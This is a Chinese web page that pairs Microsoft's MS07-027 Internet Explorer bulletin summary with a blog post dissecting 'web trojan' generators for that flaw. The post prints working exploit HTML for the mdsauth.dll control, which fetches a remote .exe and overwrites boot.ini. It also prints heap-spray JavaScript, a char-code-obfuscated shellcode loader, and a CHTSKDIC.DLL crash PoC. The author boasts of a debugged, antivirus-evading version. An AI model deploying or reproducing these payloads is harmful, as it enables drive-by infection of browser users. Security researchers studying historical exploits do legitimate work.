Internet Explorer 的累积性安全更新 (931768)发布日期: 五月 8, 2007 | 更新日期: 五月 16, 2007
版本: 1.2
摘要
本文的目标读者: 使用 Microsoft Windows 的客户
漏洞的影响: 远程执行代码
最高严重等级: 严重
建议: 客户应立即应用此更新
安全更新替代: 本公告替代多个以前的安全更新。 有关详细信息,请参阅本公告的“常见问题 (FAQ)”部分。
注意事项: Microsoft 知识库文章 931768 介绍了客户在安装此安全更新时可能遇到的当前已知问题。 本文还介绍了这些问题的建议解决办法。 有关详细信息,请参阅 Microsoft 知识库文章 931768。
测试过的软件和安全更新下载位置:
受影响的软件:
•
Microsoft Windows 2000 Service Pack 4
•
Microsoft Windows XP Service Pack 2
•
Microsoft Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2
•
Microsoft Windows Server 2003 Service Pack 1 和 Microsoft Windows Server 2003 Service Pack 2
•
Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Microsoft Windows Server 2003 SP2(用于基于 Itanium 的系统)
•
Microsoft Windows Server 2003 x64 Edition Service Pack 1 和 Microsoft Windows Server 2003 x64 Edition Service Pack 2
•
Windows Vista
•
Windows Vista x64 Edition
测试过的 Microsoft Windows 组件:
受影响的组件:
•
Windows 2000 Service Pack 4 上的 Microsoft Internet Explorer 5.01 Service Pack 4 — 下载此更新
•
安装在 Windows 2000 Service Pack 4 上的 Microsoft Internet Explorer 6 Service Pack 1 — 下载此更新
•
Windows XP Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新
•
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新
•
Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新
•
Windows Server 2003 SP1(用于基于 Itanium 的系统)和 Windows Server 2003 SP2(用于基于 Itanium 的系统)的 Microsoft Internet Explorer 6 — 下载此更新
•
Windows Server 2003 x64 Edition Service Pack 1 和 Windows Server 2003 x64 Edition Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新
•
Windows XP Service Pack 2 的 Microsoft Internet Explorer 7 — 下载此更新
•
Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新
•
Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新
•
Windows Server 2003 SP1(用于基于 Itanium 的系统)和 Windows Server 2003 SP2(用于基于 Itanium 的系统)的 Windows Internet Explorer 7 — 下载此更新
•
Windows Server 2003 x64 Edition Service Pack 1 和 Windows Server 2003 x64 Edition Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新
•
Windows Vista 中的 Windows Internet Explorer 7 — 下载此更新
•
Windows Vista x64 Edition 中的 Windows Internet Explorer 7 — 下载此更新
-----------------------
MS07027漏洞网站挂马分析2007-05-25 19:11
5月16号微软更新了Internet Explorer的这个漏洞补丁。好像这个漏洞并不流行,不过网上已经MS07027漏洞利用的工具了,我所了解的有两款:MS07027网马生成器与最新MS07027+免杀ANI超强高效率网马生成器。
一、MS07027网马生成器会生成一个MS07027.html文件,内容如下:
<html>
<title> MS07-027 Oday </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://127.0.0.1/0.exe"
target.SaveAs "c:\boot.ini"
<script src="inject.js"></script>
</script>
</body>
</html>
这段代码最初是从好友Hysia的博客上看到的,不过这个MS07027网马生成器显然是在骗人!根本没把shellcode拿出来!shellcode应该在inject.js文件里,可是根本就没生成这个js文件,就一个MS07027.html!并且网上也没公布全部的shellcode……仅公布了一部分:
function PrepMem()
{
//Standard Heap Spray Code
var heapSprayToAddress = 0x06060606;
var payLoadCode = HeapRepairCode + Shellcode;
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
}
function GetSystemVersion()
{
//Simple Detecting of OS version out of Jscript version:
var ver = "";
ver += ScriptEngineMajorVersion();
ver += ScriptEngineMinorVersion();
ver += ScriptEngineBuildVersion();
if ( ver<568820 ){ return("preSP2"); }
else if ( ver<575730 ){ return("SP2"); }
else return (0);
}
二、还有那个所谓的“最新MS07027+免杀ANI超强高效率网马生成器”会生成fyms07027.htm这个文件。我的电脑没打这个补丁,于是开了IIS测试。有反应:第一次电脑直接崩溃重启……后面接着测试,发现这个代码的执行速度太慢了,等了半天也没出现预期的结果!就不测试了,fyms07027.htm的源码如下:
<html>
<body>
<SCRIPT language="javascript">
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,51,52,51,34,43,34,37,117,52,51,52,51,34,43,34,37,117,52,51,101,98,37,117,53,55,53,54,37,117,52,53,56,98,37,117,56,98,51,99,37,117,48,53,53,52,37,117,48,49,55,56,37,117,53,50,101,97,37,117,53,50,56,98,37,117,48,49,50,48,37,117,51,49,101,97,37,117,51,49,99,48,37,117,52,49,99,57,37,117,51,52,56,98,37,117,48,49,56,97,37,117,51,49,101,101,37,117,99,49,102,102,37,117,49,51,99,102,37,117,48,49,97,99,37,117,56,53,99,55,37,117,55,53,99,48,37,117,51,57,102,54,37,117,55,53,100,102,37,117,53,97,101,97,37,117,53,97,56,98,37,117,48,49,50,52,37,117,54,54,101,98,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,101,98,48,49,37,117,48,52,56,98,37,117,48,49,56,98,37,117,53,102,101,56,37,117,102,102,53,101,37,117,102,99,101,48,37,117,99,48,51,49,37,117,56,98,54,52,37,117,51,48,52,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,54,56,37,117,99,48,51,49,37,117,98,56,54,54,37,117,5
4,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,5
1,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,117,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,37,117,99,48,51,49,37,117,98,56,54,54,37,117,54,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50
,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,51,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,1
17,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,13,10,53,51,53,48,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,54,97,53,51,37,117,56,57,52,52,37,117,53,51,101,48,37,117,53,51,53,51,37,117,53,52,53,51,37,117,53,51,53,48,37,117,53,51,53,51,37,117,53,51,52,51,37,117,53,51,52,98,37,117,53,49,53,51,37,117,56,55,53,51,37,117,98,98,102,100,37,117,100,48,50,49,37,117,100,48,48,53,37,117,100,102,101,56,37,117,102,102,102,101,37,117,53,98,102,102,37,117,99,48,51,49,37,117,53,48,52,56,37,117,98,98,53,51,37,117,99,98,52,51,37,117,53,102,56,100,37,117,99,102,101,56,37,117,102,102,102,101,37,117,53,54,102,102,37,117,101,102,56,55,37,117,49,50,98,98,37,117,54,100,54,98,37,117,101,56,100,48,37,117,102,101,99,50,37,117,102,102,102,102,37,117,99,52,56,51,37,117,54,49,53,99,37,117,56,57,101,98,34,41,59,10,13,10,98,105,103,98,108,111,99,107,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,68,48,68,37,117,48,68,48,6
8,34,41,59,10,13,10,104,101,97,100,101,114,115,105,122,101,32,61,32,50,48,59,10,13,10,115,108,97,99,107,115,112,97,99,101,32,61,32,104,101,97,100,101,114,115,105,122,101,43,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,13,10,10,119,104,105,108,101,32,40,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,60,115,108,97,99,107,115,112,97,99,101,41,32,98,105,103,98,108,111,99,107,43,61,98,105,103,98,108,111,99,107,59,13,10,10,102,105,108,108,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,108,97,99,107,115,112,97,99,101,41,59,10,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,45,115,108,97,99,107,115,112,97,99,101,41,59,13,10,10,119,104,105,108,101,40,98,108,111,99,107,46,108,101,110,103,116,104,43,115,108,97,99,107,115,112,97,99,101,60,48,120,52,48,48,48,48,41,32,98,108,111,99,107,32,61,32,98,108,111,99,107,43,98,108,1
11,99,107,43,102,105,108,108,98,108,111,99,107,59,13,10,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,102,111,114,32,40,105,61,48,59,105,60,55,53,48,59,105,43,43,41,32,109,101,109,111,114,121,91,105,93,32,61,32,98,108,111,99,107,32,43,32,115,104,101,108,108,99,111,100,101,59,10"
i=t
execute(rechange(I))
</SCRIPT>
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
<!--这个object不是MS07027漏洞的object,这要注意-->
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
by the FrSIRT < http://www.fy.com >
Solution - http://www.fy.com/</body><script>location.reload();</script>
</html>
完全解密后,发现是奇怪的乱码。不知道为什么……谁有兴趣可以去解密,也可以运行这段代码看看。估计就是由于这些原因限制了MS07027漏洞的利用吧。看了好多可以利用的漏洞,还是MS07017与MS06014这两个漏洞经典!
---------------
今天终于调试出来了,效果与06014基本一样,全过杀毒软件,只公开,部分调试代码,因为怕天下大乱,所以暂时只公布部分的调试代码!
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://192.168.1.168/1.exe"
target.SaveAs "c:\boot.ini"
<script src="inject.js"></script>
</script>
</body>
</html>
以下是部分shellcode
===========///ms07-027 exploit ///================
function PrepMem()
{
//Standard Heap Spray Code
var heapSprayToAddress = 0x06060606;
var payLoadCode = HeapRepairCode + Shellcode;
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
}
function GetSystemVersion()
{
//Simple Detecting of OS version out of Jscript version:
var ver = "";
ver += ScriptEngineMajorVersion();
ver += ScriptEngineMinorVersion();
ver += ScriptEngineBuildVersion();
if ( ver<568820 ){ return("preSP2"); }
else if ( ver<575730 ){ return("SP2"); }
else return (0);
}
我会做个演示动画给大家看的,这只是部分代码!
-------------------------
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
=============== CHTSKDIC.DLL.htm start ================
<!--
// Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42}
// Info: ImeSingleKanjiDict// ProgID: ID2
// InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL
!-->
<html><body>
<object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object>
</body></html>
=============== CHTSKDIC.DLL.htm end ==================